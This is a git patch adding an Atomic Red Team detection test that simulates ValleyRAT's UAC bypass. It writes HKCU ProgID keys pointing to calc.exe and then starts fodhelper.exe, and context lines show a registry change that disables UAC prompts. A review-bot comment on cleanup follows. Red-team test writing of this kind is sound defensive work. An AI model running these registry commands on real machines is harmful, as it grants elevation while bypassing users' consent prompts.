From df25f7e1ffb203ecbb15e62550feb72b61cce1e8 Mon Sep 17 00:00:00 2001
From: Br3akp0int <26181693+tccontre@users.noreply.github.com>
Date: Tue, 24 Sep 2024 17:30:06 +0200
Subject: [PATCH] Uac bypassed via prog i ds (#2940)

* ShrinkLocker PIN,TPM Bitlocker Registry Modification
* Revert "ShrinkLocker PIN,TPM Bitlocker Registry Modification"
* Update T1548.002.yaml
--------
Co-authored-by: Carrie Roberts
---
 atomics/T1548.002/T1548.002.yaml | 21 ++++++++++++++++++++-
 1 file changed, 20 insertions(+), 1 deletion(-)

diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml
index 24941299..9c67405d 100644
--- a/atomics/T1548.002/T1548.002.yaml
+++ b/atomics/T1548.002/T1548.002.yaml
@@ -692,4 +692,23 @@ atomic_tests:
 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
 cleanup_command: |
 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5 /f
- name: command_prompt
\ No newline at end of file
+ name: command_prompt
+
+- name: UAC bypassed by Utilizing ProgIDs registry.
+ auto_generated_guid: b6f4645c-34ea-4c7c-98f2-d5a2747efb08
+ description: |
+ This atomic designed to simulate the UAC bypassed made by ValleyRAT by adding customized ProgIDs registry entry.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /d "C:\Windows\System32\calc.exe" /f
+
+ reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /d ".pwn" /f
+
+ echo Triggering fodhelper.exe for potential privilege escalation...
+ start fodhelper.exe
+ cleanup_command: |
+ reg delete "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /f
+ reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /f
+ name: command_prompt
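Review bot: The cleanup_command at the end of the hunk only removes the default values (`/ve`) and leaves the `.pwn` and `ms-settings` key trees the test created under HKEY_CURRENT_USER\Software\Classes in place, so the ProgID artifact persists on the host after cleanup and the test is not fully self-reverting. Deleting the keys themselves, `reg delete "HKEY_CURRENT_USER\Software\Classes\.pwn" /f` and `reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f`, would remove everything the two `reg add` lines create; the calc.exe launched through fodhelper.exe is likewise left running and could be terminated in the same step. The entry also has no `elevation_required` field, which is worth stating explicitly as `elevation_required: false` since the HKCU-only writes are exactly why the test needs no elevation and detection engineers will want that documented. The description would read more clearly as `This atomic simulates the UAC bypass used by ValleyRAT by adding a custom ProgID registry entry.`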